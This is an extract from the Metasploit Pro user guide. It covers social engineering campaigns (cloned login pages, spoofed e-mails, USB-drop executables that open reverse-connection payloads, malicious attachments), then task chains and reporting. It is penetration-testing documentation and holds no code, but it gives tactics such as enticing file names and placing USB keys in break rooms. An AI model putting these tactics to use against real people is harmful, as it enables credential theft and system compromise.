Apply a web page template - To apply a web page template, click the Template dropdown and choose the template that you want to apply to the web page. When you apply a template, Metasploit Pro uses the predefined content to create the web page. Create custom HTML - To create a custom web page, use the content editor to write the HTML for the web page. Clone an existing website - This is the recommended method. To clone a website, click the Clone Website button. When the Clone Website modal window appears, enter the web page that you want to clone. The web page that you want to clone must contain a web form. For example, web pages that have login fields or prompt the user for sensitive information are good web pages to clone.
11. When you finish adding the web page content, click the Save button to save the web page component.
2. When the Manage Campaigns area appears, open an existing campaign or configure a new campaign. Verify that the campaign uses the Custom setup.
Web Page
365
5. When the Web Page configuration page appears, add the web page name to the URL path. This completes the URLpath name. For example, if your domain is http://www.mycompany.com, and your web page name is support, then the complete URLis http://www.mycompany.com/support.
6. In the Name field, enter a name for the web page component. This name displays under the web page button on the campaign configuration page.
7. Click the Attack Type dropdown and choose a social engineering attack method.
Web Page
366
9. Click the Next button to continue to the Web Page Content window. 10. When the Web Page Content window appears, click the Clone Website button.
11. Enter the URL of the web page that you want to clone in the URL to clone field.
12. Choose any of the following options to customize the cloned web page:
l
Strip Javascript - Removes Javascript tags from the cloned HTML and prevents any scripts from running URL checking code or redirecting the human target to the real site. Set referer - Sets the HTTP referer header on the outgoing request for the cloned web page. Use this option if you want to use a page that checks referers or if you want to appear to the sites administrator as a user that browsed to the website (e.g., http://www.company.com/home).
Set user agent - Sets the user agent header on the outgoing request for the cloned web page. Use this option if you want to get a targeted version of a website or if you want your request to appear to come from a normal browser. Resolve relative URLS - Resolves any relative URLS to absolute URLs in the cloned HTML. This option is selected by default.
Web Page
367
13. Click the Clone button. Metasploit Pro copies the HTML from the web page and displays it in the Content window. 14. Click the Save button to save the web page component.
Redirect Pages
A redirect page is the web page that you forward the human target to after they submit data on a phishing site. A redirect page can be a simple web page that displays a warning message to the human target or it can redirect human target to another web form. For example, the redirect page can display a security warning like This was a social engineering test. Please do not open any e-mails from sources that you do not trust. Additionally, a redirect page can be a web page that delivers an exploit, runs Browser Autopwn, or serves a Java signed applet to the human target. If you intend to use a redirect page in your campaign, you must create it before you create the landing page that the human target initially visits. If you do not create the redirect page first, you will not be able to set a redirect page for the landing page. To create a redirect page, you use the same steps as you would to create a regular web page.
Web Page
368
Portable File
A portable file refers to an executable file or file format exploit that you can save to an external storage device. You create portable files when you want to send a malicious file to a human target using a delivery method other than e-mail. Portable files are most commonly used in USB key drops, but you can also save them to CD-ROMs or any other storage device. A portable file is a campaign component and is created as part of a campaign. The portable file component generates a downloadable file that contains an embedded payload. The delivered payload establishes the connection between the victims machine and the attacking machine.
Name -The name of the USB key component. Listener Callback IP - The IP address that the attacking machine uses to listen for a connection. Listener Callback Port - The port that the attacking machine uses to listen for a connection. Payload Type - The type of payload that the executable file delivers to the target. Filename - The name for the executable file that Metasploit Pro creates.
2. When the Manage Campaigns page appears, click the Configure a Campaign tab.
Portable File
369
3. In the Name field, enter a descriptive name for the campaign. For example, USB-PayrollEXE helps you quickly identify the campaign type and the executable file name. 4. Select the Custom Campaignsetup.
5. Click the Add e-mail, web page, portable file button. A set of buttons for campaign components appears.
Portable File
370
7. When the Portable File configuration window appears, enter the following information:
l
Component name - The name of the campaign component. This name displays under the portable file button on the campaign configuration page. File name - The name of the file that Metasploit Pro generates for you. The file name should include the file extension. If you do not supply the correct extension for the file, the exploit will not run on the targets machine.
Executable file - Metasploit Pro generates an executable file that delivers the generic payload handler (exploit/multi/handler) to the human target. No further action is needed if you choose to generate an executable file. Click Save to save the component configuration and to exit the configuration window. File format exploit - Metasploit Pro generates a malicious file for you to deliver the exploit to the human target. If you choose to generate a file format exploit, the Module Search page will appear. You will need to search for the module that you want to use and configure the settings for the exploit. Save the module configuration and the portable file component configuration when you are done.
Portable File
371
Target Lists
A target list defines the targets that you want to e-mail the social engineering attack. You can either manually create the target list from within a campaign or you can import a CSV of targets. A target list is project specific and is only accessible to the campaigns that are part of the project.
4. When the Upload Target List page appears, enter a name for the target list in the List Name field.
372
5. Under the Manually Add Targets area, enter the e-mail, first name, and last name of the human target that you want to add.
6. Click the Add (+) button to continue to add additional human targets. 7. When you are done, click the Save button.
Target Lists
373
Target Lists
374
5. Click the Delete button. 6. Click OK to confirm that you want to delete the target list.
Templates
A template is a preformatted and reusable set of content you can apply to an e-mail or web page. It is essentially a wrapper that wraps around the web page or e-mail content. You can use a template to instantly add content or formatting to a web page or e-mail. A template is project specific and cannot be accessed globally.
Web Templates
A web template defines optional pre-existing HTML code that you can use to wrap around the content of a web page component. Typically, a web template defines stylistic design elements and generic information that you can tailor to a specific target when you build the actual web page. The purpose of a web template is to provide reusable presentation logic that you can share between campaigns that are part of the same project. For example, if you intend to use a spoofed version of your companys web page for the majority of your campaigns, you should create a web template of your companys site. This enables you to quickly build a web page based on an existing template and customize the web page according to your needs.
Templates
375
6. When you create the HTML, you need to make sure that the web page includes the <html> tag to indicate the start of the web page and the </html> tag to denote the end of the web page. By default, web template includes the <head> element. 7. Additionally, you need to define the title for the web page. By default, the title is Metasploit Pro Social Engineering Web Page. To replace the title with your own title, find the <title> element and replace the text inside the <title> element. You need to replace the title with the title of your web page. 8. When you are ready to create the body of the web page, find the <body> element. The majority of the information for the web page will be defined in the <body> element. For example, you can define the background color and web page text. 9. When you are ready to insert the content from the web page content into the template, click the Insert Custom Attribute dropdown, and select the Web Page Content attribute. This adds the {{ web_ page_content }} tag, which denotes that the content from the web page component should be placed there. 10. When you finish creating the web template, click the Save button.
Templates
376
3. From the campaign configuration page, add a web page component to the campaign. 4. When the web page configuration page appears, click the Web Page button. 5. When the web page configuration page appears, add the web page ID to the URL path. 6. In the Name field, enter a name for the web page component. This name displays under the web page button on the campaign configuration page. 7. Click the Attack Type dropdown and choose a social engineering attack method. 8. If the web page is part of a phishing attack, you will need to choose a redirect page. Choose one of the following options to select the redirect page:
l
Redirect to URL - Redirects the human target to a real web page. For example, you can redirect the human target back to the companys website or intranet. Campaign Redirect Page - Uses the redirect page that you create as part of the campaign. The redirect page must already exist for you to choose this option.
9. Click the Next button to continue to the Web Page Content window. 10. When the Web Page Content window appears, click the Template dropdown and choose the web template that you want to apply to the web page. 11. Click the Save button to save the web page.
E-mail Templates
An e-mail template defines a message or the HTML code that you can insert into an e-mail. An e-mail template contains optional HTML code that you can use to wrap the content of individual e-mail components.You should create an e-mail template for content that you want to reuse between campaigns that are within the same project, such as logos, banners, and footers. For example, you can create an e-mail template that contains a message that tells a victim to update their account information. The template content can contain a message like the following: This is a friendly reminder to update your account passwords.
E-mail Templates
377
Or if you have a footer or logo that you want to reuse across multiple e-mails, you can create an e-mail template that contains the footer or banner information. So, when you create the e-mail, you can simply apply the e-mail template in order to insert the logos and banners that you need.
HTML Editor - The HTML editor is an editing interface that you use to create the content for an e-mail template. It includes a built-in toolbar for text formatting, which makes it possible for you to create email content without any HTML knowledge. Text Editor - The text editor is an editing interface that you use to create the content for an e-mail template. Unlike the HTML editor, it does not include a formatting toolbar. Instead, you must have prior knowledge of HTML to create e-mail content.
E-mail Templates
378
5. Click the Insert Custom Attribute dropdown, and select the E-mail Content attribute. 6. Under the {{email_content}} attribute, enter the e-mail body for the template. 7. When you finish creating the e-mail content, click the Save button.
Malicious Files
A malicious file refers to a custom user supplied file that you can use in a campaign to exploit a target machine. Examples of a malicious file include custom written scripts, executables, or payloads. To deliver a malicious file to a human target, you must first upload the file to the project. Once the malicious file is uploaded, you can use either an e-mail or web page to deliver the malicious file to the human target. Each of these campaign component provides an option to attach a user supplied file to it.
Malicious Files
379
11. From the Choose a Target List dropdown, select the target list that you want to send the e-mail to. 12. From the Attack type dropdown, choose the Attach file option. 13. In the Attachment file name field, enter the name of the malicious file you want to deliver to a human target. The file name must include the file extension. For example, if you are attaching a PDF, the file name should include the PDF extension. 14. From the File generation type options, choose User supplied file. 15. From the Choose a file dropdown, select the malicious file that you want to attach to the e-mail. Please remember that you must upload the malicious file before you can access it through a campaign component. If the file that you want to use has not been uploaded, you can choose the Upload a new file option to upload the file that you want to use. 16. Click the Next button to create the e-mail body. 17. After you create the e-mail body, click the Save button to close the e-mail configuration window. 18. From the campaign configuration page, click the E-mail Server button. If you have a global SMTP server set up, you can click the Save button to validate and save the server settings. If you do not have a global SMTP server configured, you will need to provide the SMTP settings for your mail server. After you define the SMTP settings, you can click Save to validate the server settings and to close the e-mail server configuration window. 19. When the campaign configuration page appears, click the Save button to save the campaign or click the Launch Campaign button to start the campaign.
Malicious Files
380
10. From the File generation type options, choose the User supplied file option. 11. From the Choose a file dropdown, select the malicious file that you want to attach to the e-mail. Please remember that you must upload the malicious file before you can access it through a campaign component. If the file that you want to use has not been uploaded, you can choose the Upload a new file option to upload the file that you want to use. 12. Click the Next button to create the web page content. 13. After you create the web page content, click the Save button to close the web page configuration window. 14. From the campaign configuration page, click the Web Server button. 15. When the web server configuration window appears, select the host name that you want to use to host the web page. 16. In the Listening Port field, enter a port that is commonly used for HTTP traffic, such as ports 80 or 8080. 17. Click the Save button to save your changes and to close the web server configuration window. 18. Now that you are back on the campaign configuration page, you need to create an e-mail to deliver the web page URL to the human targets. 19. From the Campaign Components area, click the Add e-mail, web page, portable file button. 20. Click the E-mail button. 21. When the e-mail configuration window appears, enter a name for the e-mail component in the Component name field. This is the name that displays for the component on the campaign configuration page. 22. In the Subject field, enter a subject for the e-mail. 23. In the From address field, enter the e-mail address that the campaign is trying to spoof. 24. In the From name field, enter the name of the person that the spoofed e-mail should appear to be from. 25. From the Choose a Target List dropdown, select the target list that you want to send the e-mail to. 26. From the Attack type dropdown, choose None. 27. Click the Next button to create the e-mail body. 28. After you create the e-mail body, click the Save button to close the e-mail configuration window. 29. From the campaign configuration page, click the E-mail Server button. If you have a global SMTP server set up, you can go ahead and click the Save button to validate and save the server settings. If you do not have a global SMTP server configured, you will need to provide the SMTP settings for your mail server.
Malicious Files
381
30. After you define the SMTP settings, you can click Save to validate the server settings and to close the e-mail server configuration window. 31. When the campaign configuration page appears, click the Save button to save the campaign or click the Launch Campaign button to start the campaign.
Malicious Files
382
Executable Files
An executable is a portable file that delivers the embedded generic multi-handler payload to a victims machine. The payload creates a reverse connection over HTTPS from the victims machine to the multihandler listener that is running from a campaign. When the multi-handler listener receives the incoming connection, it delivers the remaining payload to the victims machine. After a connection has been established between the two machines, you can take control of the session to gain further access into the network or to gather information from victims machine. To set up the handler, you need to specify the listener port, or LPORT. Metasploit Pro uses the LPORT that you assign and the local Metasploit instance as the callback IP address to configure the handler.
383
8. In the Generated file name field, enter a name for the executable file. This is the file name that the human target sees when they look at the contents of the USB drive. You want to give the file a name that entices the user to click on it. For example, a name like Payroll or Company Bonuses may work well. 9. In the Listener Host field, enter the callback IP address you want to the payload use. By default, the callback IP is the address of your Metasploit server. 10. In the Listener Port field, enter the callback port that you want the payload to use. By default, the callback port is 1024. 11. Select the Payload type for the executable file. 12. Verify that Executable file is selected as the File generation type. 13. Save the executable. 14. When the Configure a Campaign area reappears, you will see a Download link located beneath the USB Key icon. Click the Download link and save the executable file to a location on your local machine. The Desktop or Downloads folder is a good location. 15. Click the Launch Campaign button to start the campaign. The campaign must be online in order for you to get a session on the human targets system. 16. Insert your USB key into your USB port and move the executable over to your USB drive. The USB key is now ready for you to drop off. You should select an area that has high traffic volume or a location where people are more likely to set things down and forget them, such as bathrooms, copy rooms, and break rooms. This increases the chances of someone finding the USB key and installing it on their system. If you are able to successfully create a backdoor on the victims machine, you can use it to pivot to other machines on the network and collect information from the victim.
Executable Files
384
385
14. When the campaign configuration area reappears, you will see a Download link located below the campaign component icon. Click the Download link and save the file to a location on your local machine. The Desktop or Downloads folder is a good location. 15. When you are ready to start the campaign, click the Launch Campaign button. The campaign must be online in order for you to get a session on the human targets system. 16. Insert your USB key into your computer and move the file over to your USB drive. The USB key is now ready for you to drop off. You should select a area that has high traffic or a location where people are more likely to set things down and forget them, such as bathrooms, copy rooms, and break rooms.
386
Phishing Campaigns
Phishing is a social engineering technique that attempts to acquire sensitive information from a human target. During a phishing attack, a human target receives an e-mail disguised as an e-mail from a trusted source. The spoofed e-mail contains a tracking link that opens an authentic looking web page, which contains a web form that you want the human target to fill out. If the human target fills out and submits the form, you can capture their information and use it as evidence. Phishing is a good way for you to test the following issues:
l
The security perimeter, e-mail infrastructure, and client-side safety measures prevent unauthorized access and malicious activity. The security awareness and training programs effectively teach employees how to identify and prevent a phishing attack.
Set up the global SMTP settings - To access the global settings, select Administration > Global Settings from the main menu. Find the SMTP settings and enter the information for your SMTP server. Verify that your local machine can reach the Internet - Metasploit Pro must be able to access the Internet in order to clone a web page.
Phishing Campaigns
387
Create or import target lists - The target list defines the e-mail addresses of the human targets that you want to send the phishing e-mail. You can create the target list from within the Phishing Wizard, but it is recommended that you set up your target lists before you create a campaign.
Redirect to URL - Redirects the human target to a real web page. For example, you can redirect the human target back to the companys website or intranet. Campaign Redirect Page - Uses the redirect page that you create as part of the campaign.
388
4. Click the Next button to continue to the Web Page Content window. 5. When the Web Page Content window appears, choose one of the following options to add HTML to the web page:
l
Create custom HTML - To create a custom web page, use the content editor to write the HTML for the web page. Clone an existing website - This is the recommended method. To clone a website, click the Clone Website button. When the Clone Website modal window appears, enter the web page that you want to clone. The web page that you want to clone must contain some sort of web form.
Create custom HTML - To create a custom web page, use the content editor to write the HTML for the web page. Clone an existing website - This is the recommended method. To clone a website, click the Clone Website button. When the Clone Website modal window appears, enter the web page that you want to clone. The web page that you want to clone must contain some sort of web form.
Subject - The subject that displays in the message header and the subject line. From Address - The senders e-mail address. From Name - The senders name.
3. Click the Target list dropdown and choose a target list. 4. Click Next to continue to the E-mail Content window.
389
5. When the E-mail Content window appears, you need to create the body for the e-mail. Use the plain text or rich text editor to create the e-mail body. 6. After you create the content, you need to add a link to the landing page. To do this, either highlight the text in the e-mail content that you want to use as the display text or place the your cursor at the insertion point where you want the URL to appear in the e-mail. 7. Click the Insert Custom Attribute dropdown and select Link to Landing Page. 8. When the Insert a Landing Page window appears, enter the text that you want to display in the e-mail and click Insert. The link will appear as {% campaign_web_link 'DISPLAY TEXT', 'Landing' %} in the E-mail Content window. 9. Click Save to save the e-mail component.
This servers IP address - Uses the IP address of the local machine. This servers host name - Uses the host name of the local machine. Custom - Uses the domain name, if DNS is set up and is reachable by the Metasploit instance.
3. In the Listening Port field, enter the port that you want to use to run the web server. You should specify a port that is typically used for HTTP traffic, such as 80 or 8080. 4. Click Save to save the web server settings.
Host - The fully qualified mail server address (e.g., mail.domain.com). Port - The port that SMTP runs on. Typically, SMTP runs on port 25. Username - The user name that the system uses to authenticate the mail server. Password - The password that the system uses to authenticate the mail server.
390
3. When the Notification Settings window appears, enter the e-mail addresses of the people you want to send the alert to in the To field. 4. In the Subject field, enter the subject that you want the e-mail to display. By default, Metasploit Pro auto-fills the subject for you with a canned subject line. 5. In the Message field, enter the information, or body, that you want to send in the e-mail. For example, you may want to say something like: This is a company wide alert to inform you that we are starting our security awareness program. If you have any questions, please contact John Smith. 6. When you are done creating the notification e-mail, click the Save button.
Saving a Campaign
When you finish configuring the campaign components, you need to save the campaign.
l
391
From the project that contains your campaign, select the Sessions tab from the Tasks bar. You will see a list of open sessions under the Active Sessions area. Click on any session ID to view the actions that you can take against the victims system.
Cleaning Up Sessions
A session clean up closes the connection between the attacking machine and the victim and removes any artifacts from Metasploit Pro. You need to perform a session clean up to close sessions that you no longer need to access. 1. From the project that contains your campaign, select the Sessions tab from the Tasks bar. A list of open sessions appears under the Active Sessions area. 2. Select the sessions that you want to close and click the Clean Up button.
392
A statistical overview of the campaign findings. Actions taken by the human targets in a campaign. Statistical analysis of human target behavior and easy identification of high risk targets. Browser and operating systems used by human targets in a phishing attack. Raw data from the components used to create a campaign. Any exploits that were used in the campaign and any sessions that were obtained from compromised systems. Remediation steps that can be implemented or can be recommended to reduce the threat of social engineering attacks across an organization.
Section Cover Page Executive Summary Social EngineeringFunnel Exploits Used Form Submissions Browser/PlatformInformation Appendix:Host Details
Included by Default X X X
X X X X
393
Section Appendix: Human Targets Appendix: E-mails Appendix: Web Pages Appendix: Portable Files Appendix:Remediation Advice Appendix:Notes
Included by Default
X X
394
Cover Page
395
Executive Summary
396
397
Exploits Used
398
Form Submissions
399
400
401
402
Remediation Advice
403
Report Notes
404
1. From within a project, click the Reports tab. 2. Click the Standard Report button. 3. When the New Report form appears, click the Report type dropdown and choose Social Engineering Campaign Details Report. 4. From the SE Campaign Detail Report Format options, choose the format you want to use to generate the report. The most common format is PDF. 5. In the Name field, enter the name that you want to assign to the report. This is the name that displays in on the Reports page in the Metasploit Pro and the name that the system uses to save the report. You can choose to use the default naming convention, which uses the report type as the report name and appends the report name with the task number. 6. Click the Campaign dropdown menu and choose the campaign that you want to generate a report for. 7. From the Report Sections options, deselect any report sections that you do not want to include in the report. By default, all sections are included; however, if the campaign does not have any data for a particular section, the section will be empty in the report. Note: If your campaign does not use an exploit or deliver a payload to the human target, your report will not show any data for the Exploits Used section or display any values for the % of systems exploited and compromised in the Social Engineering Funnel. 8. Select the Include web page HTML option if you want to include the raw HTML code for all the web page components that are part of the campaign. 9. If you want to e-mail the generated report, you can select the E-mail report option and enter a comma separated list of the e-mail addresses that you want to send the report to. Note: If you choose to e-mail the report, please make sure that you have the SMTP settings configured through the Global Settings. 10. Click the Generate button to create the report. The Task Log appears and shows you the progress of the report generation. 11. When the report generation is complete, click the Reports tab to view a list of reports stored in the project. 12. Find the report you just generated. You can either view the report directly through your browser or you can download the report and save it to a location on your system.
405
406
Chapter 18:
About Task Chains
Task Chains
Creating, Scheduling, and Running Task Chains Managing and Editing Task Chains
Task chains list - Displays all the task chains that are stored in the project. From this list, you can bulk manage task chains, view the current status for a task chain, view the contents of the task chain, and identify when a task chain will run next. Task chain configuration page - Displays the contents of a task chain. From this page, you can add, configure, and rearrange tasks, and you can create the schedule for the task chain.
Create a new task chain Delete task chains Clone task chains Suspend task chains Run task chains View the current status for a task chain View the last time the task chain was run View the tasks that comprise a task chain
To access the task chains list, select Tasks > Chains from the Project tab bar.
408
1. New Task Chain button - Opens the NewTask Chain configuration page. 2. Task chain bulk management buttons - Bulk manages task chains. You can do things like delete, clone, suspend, and run multiple task chains at once. 3. Task chains list - Lists all of the task chains that have been created for the project. Each task chain will have one of the following schedule icons:
l
Recurring Schedule - Indicates that the task chain repeatedly runs at a specified time and day. Single Schedule - Indicates that the task chain is scheduled to run once at a specified time and date. Not Scheduled - Indicates that the task chain does not follow a schedule. Suspended - Indicates that the task chain is inactive.
4. Task chain status - Displays one of the following statuses for each task chain:
l
Never run - The task chain has never run. Running - The task chain is currently running. Last run - The task chain last ran successfully at the specified date. Failed - The task chain was unable to finish successfully. If the task chain failed, it will display a link that you can click on to open the Task log and view the errors that occurred.
409
1. Task Chain Name field - Displays an editable field for the task chain name. You can click on the field at any time to edit its name. 2. Schedule status - Indicates whether or not a schedule has been created for the task chain. It displays one of the following statuses:
l
Scheduled - Indicates that a schedule has been created for the task chain. Unscheduled - Indicates that a schedule has not been created for the task chain.
3. Schedule Now link - Opens the Task ChainScheduler, which enables you to schedule and suspend task chains. Additionally, you can enable the option to clear project data before the task chain runs. 4. Save and Run button - Saves the current task chain configuration and immediately runs the task chain. 5. Save button - Saves the current task chain configuration. The task chain will be available for you to run on demand or it will run according to the schedule that you have created for it. 6. Delete task - Removes the selected task from the task chain. 7. Clone task - Duplicates the selected task and adds it to the end of the task chain. 8. Reset task configuration - Clears all tasks from the task chain. 9. Task bubble - Represents a task. You can click on a task bubble to open the task configuration form. The selected task bubble will be highlighted in blue. Any task highlighted in red indicates that the task has not been configured correctly and the task chain cannot be saved. You can click on the task to fix the issues on the task form. You can also click and drag the task bubble to move the task to a new position in the task chain.
410
10. Add Task button - Displays the task list and enables you to select the task that you want to add to the task chain. 11. Task configuration form - Displays the options that you can configure for the task that is selected. Options will vary depending on the task that is selected.
Supported Tasks
Task chains can be used to execute the following tasks:
l
Discovery scan - Enumerate and fingerprint hosts on a target network. Import - Bring in data from supported third-party scanners, such as Nexpose and Nessus. Vulnerability scan - Scan a target network with Nexpose to find vulnerabilities on a target network. Web scan - Scan web forms and applications to find and exploit active content and forms. Bruteforce - Systematically attempt various combination of letters, numbers, and characters to crack credentials. Auto-exploitation - Automatically build an attack play by cross-referencing open ports, imported vulnerabilities, and fingerprint information to exploit modules. Single module run - Launch a module to perform targeted attacks against hosts or to gather additional data about hosts. You can add multiple modules to a task chain. MetaModules run - Launch one of the following MetaModules: the Single Password Testing MetaModule, the Known Credentials MetaModule, the SSHKey Testing MetaModule, the Pass the Hash MetaModule, the Firewall Egress Testing MetaModule, or the Passive Network Discovery MetaModule. Evidence collection - Collect evidence, such as screenshots, password hashes, and system files, from compromised hosts. Session clean up - Close any open sessions on compromised hosts. Report generation - Create a report to document findings and share test results.
Supported Tasks
411
The New Task Chain page appears. 3. Enter a name for the task chain in the Task Chain Name field.
412
A new task bubble appears on the task chain and the task configuration page displays below the task chain.
6. Configure the task as you usually would. The steps for configuring a task vary based on task type. For more information on configuring a specific task, see one of the following topics:
l
Running a Discovery Scan on page 135 Importing Scan Data on page 150 Running a Nexpose Scan on page 205 Running a Bruteforce Attack on page 226 Running a Module on page 119 Running Automated Exploits on page 238
After you configure the task, you can add additional tasks to the task chain. When you finish building the task chain, you can create a schedule for the task chain or you can save the task chain to run on demand.
413
For more information on scheduling a task chain, see Task Chain Schedules on page 427 .
When you click the '+' button, the task list appears and shows you the tasks that can be added to the task chain.
After you add the task, a new task bubble appears on the task chain, and the task configuration form displays below the task chain.
The task bubble displays the tasks' position in the task chain. A task in the first position displays a number '1', a task in the second position displays a number '2', and so forth. You can click the task bubble and drag it to reposition it in the task chain. Any task bubble highlighted in red indicates that the task has not been configured correctly and the task chain cannot be saved. You can click on the task to fix the issues on the task form.
414
Cloning a Task
When you clone a task, you are adding a copy of the task to the end of the task chain. You can move or modify the task as needed. Note: You should only clone tasks that are highlighted in blue, which indicate that there are no errors in the task configuration. To clone a task, click the task you want to clone to select it.
Then, click the Clone button located in the task chain tool bar.
The cloned task will be added to the end of the task chain.
If you need to reposition the task in the task chain, click on the task and drag it to the position you want it to appear in the task chain.
Cloning a Task
415
After you reposition the task,the position that displays in the task bubble is updated. A task in the first position displays a number '1', a task in the second position displays a number '2', and so forth.
416
Then, click the Delete button located in the task chain toolbar.
A dialog window will appear and prompt you to confirm that you want to delete the task. Click OK to delete the task from the task chain. You can only remove one task at a time. If you need to remove multiple tasks, please repeat the steps listed above or reset the task chain. For more information on resetting the task chain, see Resetting a
417
Any and all data stored in the project, including hosts, collected evidence, session information, reports, and credentials will be wiped from the project. Enable this option only if you want to start the task chain with an empty project. Data cannot be recovered after it has been cleared from the project.
A dialog window will appear and prompt you to confirm that you want to reset the task chain. Click OK to reset it.
418
A dialog window will appear and prompt you to confirm that you want to run the task chain. Click OK to run it.
419
When the task chain configuration page opens, you can do things like add, clone, and remove tasks; tweak settings for a particular task; and update the schedule for the task chain.
420
The task chain configuration form appears.The form retains the configuration settings that you used to create the original task chain. You can run the task chain as is, or you can modify its settings. The cloned task chain will use the following naming convention: [task-chain-name]-timestamp.
421
When the Task Chains list appears, select the task chain whose schedule you want to suspend. The task chain that you select must be scheduled and in an unsuspended state. These task chains will have a scheduled icon located next to them. Note: If you need to bulk suspend task chains, you can select multiple task chains.
422
To unsuspend a task chain, select it and click the Unsuspend button. The task chain you selected must be in a suspended state.
When the task chain configuration page opens, click on the Schedule Now link to open the scheduler.
The scheduler will display the current schedule. You can use the scheduler to update the existing settings.
423
Any data that was collected before you stopped the tasks will still be stored in the project.
Any data that was collected before you stopped the tasks will still be stored in the project.
The Tasks Log appears and shows you the status and activity for the task.
424
425
426
Schedule Options
There are a few different schedule options that you can use to control when a task chain runs. The following schedule options are available:
l
Once - Runs the task chain once on a specific date. For example, you may want to choose this option if you want to run the task chain once at midnight on December 15, 2014. Hourly - Runs the task chain every hour. For example, you may want to choose this option if you want to run the task chain at half past every hour. Daily - Runs the task chain every day. For example, you may want to choose this option if you want to run the task chain every day at midnight. Weekly - Runs the task chain on certain days of the week. For example, you may want to choose this option if you want to run the task chain every Monday and Wednesday at midnight. Monthly - Runs the task chain on a specific day of the month. For example, you may want to choose this option if you want to run the task chain on the last day of each month.
427
Scheduling a TaskChain
1. From within the project that contains the task chain you want to schedule, select Tasks >Chains from the Project tab bar. 2. Find and open the task chain you want to schedule.
The configuration form for the task chain opens. 3. Click the Schedule Now link.
The scheduler appears. 4. Click the Run Chain dropdown to display the recurrence options.
You can choose once, hourly, daily, weekly, or monthly. The options that appear depend on the recurrence option you have selected.
Scheduling a TaskChain
428
For example, if you want to run the task chain daily, you will need to specify if the task chain should run every day, every 2 days, every 3 days, and so on. You must also indicate the date and time you want the task chain to start. 5. Click the Max Duration dropdown and choose a time limit for the task chain. (Optional)
6. Click the Done button to save the schedule. The scheduler closes and the task chain configuration page appears. 7. Save the task chain. The task chain will run according to the date and time you have scheduled.
Suspending a Schedule
You can indefinitely suspend a schedule from the Scheduler or from the Task Chains List. When you suspend a task chain, it will not run again until you re-enable the schedule or manually run it yourself. To suspend the schedule, select the Suspend option located on the Scheduler.
Suspending a Schedule
429
To unsuspend the schedule, deselect the Suspend option located on the Scheduler.
430
If you do not want to set a time limit on the task chain, you can set the maximum duration or Never Expire.
431
Chapter 19:
Reports
A report takes a snapshot of the data in a project at a particular moment in time and compiles the results into a tangible output format. You create a report to document your testing methodology, disclose your findings, and support your findings with real evidence. A report enables you to share this information with an organization so that they can quickly prioritize, reproduce, and remediate their vulnerabilities. Most of the time, you will generate a report to create a distributable document that presents both high-level statistics and detailed critical findings. Whether someone wants an at a glance summary or needs the technical details of your penetration test, the report will be able to cater to both ends of the viewer spectrum. To work with reports, you will need to use the Metasploit Pro web interface, which provides you with robust and comprehensive reporting capabilities. To learn more about reports, read the following topics:
l
About Reports on page 433 Metasploit Report Types on page 1 Generating, Downloading, Viewing, E-mailing, Cloning and Deleting Reports on page 1 Customizing Standard Reports on page 454 Working with Custom Templates on page 461
About Reports
A report takes a snapshot of the data in a project at a particular moment in time. It enables you to compile data from a project so that you can present it in a tangible output format. You create reports to document your testing methodology, disclose your findings, and support your findings with real evidence. A report enables you to share this information with an organization so they can prioritize, reproduce, and remediate their vulnerabilities. By understanding the results of a penetration test, an organization can learn how they can mitigate weaknesses in their security infrastructure.
PDF - Adocument that can be opened and viewed with Adobe Reader.This is the default type. HTML - A file that can be opened and viewed in a Web browser. RTF - A document that uses text-based encoding, which enables its content to be viewed in most major word processing applications. You can use this format if you want to edit or annotate the report or if you need to distribute the report across multiple platforms. Word - A document that can be opened, viewed, and edited in Microsoft Word. You can use this format if you want to edit or annotate the report.
You can generate any combination of output formats for each report. Each instance will be an artifact of the report. What Are Report Artifacts? An artifact refers to the output formats that have been generated for a report. For example, a PDF and RTF version of the same Social Engineering Report are artifacts of the report. To view the artifacts for a report, select Reports >Show reports from the Project tab bar. The Reports List shows all the reports that have been generated for the project and displays the artifacts for each report in the File Formats column.
About Reports
433
Reports Directory
When Metasploit Pro generates a report, it stores a copy of the file in /path/to/Metasploit/apps/pro/reports/artifacts. The files that are stored in this directory will match the list of reports displayed in the web interface. You can go to the reports directory to download or view reports; however, you should not make any changes directly to the default reports directory. If you need to modify the reports, you should make a copy of the reports directory and make your changes from the new directory. Any changes that you make directly to the reports can cause disparities between the metadata that displays for the file in the webinterface and the file itself. If you need to remove reports from a project, you should do it from within the web interface. Do not delete them directly from the reports directory.
Report Logs
The report log maintains a historical record of all report-related events. Metasploit Pro automatically updates the report log each time you generate a report. If you experience any issues with a report, you can view the report log to find stack trace errors and troubleshoot them.
Reports Directory
434
1. Report Type - Choose from one of the following report types: Activity, Audit, Authentication Tokens, Collected Evidence, Compromised and Vulnerable Hosts, FISMACompliance, PCICompliance, Services, Social Engineering, and WebApplication Assessment.
435
2. File Format - Select the output format you want to use to generate the report. The form automatically displays the output formats that are supported for the report type that is currently selected. All reports support PDF, RTF, and HTML. Some reports, like the Web Application Assessment Report, do not support Word. 3. Name - Specify the name that you want to save the report as. This is the report name you will see when you view the Reports List or when you download the report. 4. Address Settings - Use the Included addresses field to create a white list or use the Excluded addresses field to create a black list. A white list explicitly defines the hosts you want to include in the generated report. A black list, on the other hand, explicitly defines the hosts you want to exclude from the report. 5. Cover Logo - Specify the logo that you want to add to the cover page of the report. 6. Sections - Choose the sections you want to include in the report. By default, all report sections are selected. The report sections that are available vary between report types. The form automatically displays the sections that are supported for the report type that is currently selected. 7. Options - Use these options to manage confidential data and graphics in a report. The report form displays the options that are applicable for the report type selected. The following options may be available for each report:
l
Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from a report. The report displays the user name and a blank password. Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session. Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in a report. Include web page HTML (in addition to image preview) - Includes a preview of the web pages used in the social engineering campaign. (Social Engineering Campaign Details Report only)
8. Email Report - Automatically sends the finished report to a list of comma separated or semi-colon separated e-mail addresses.
436
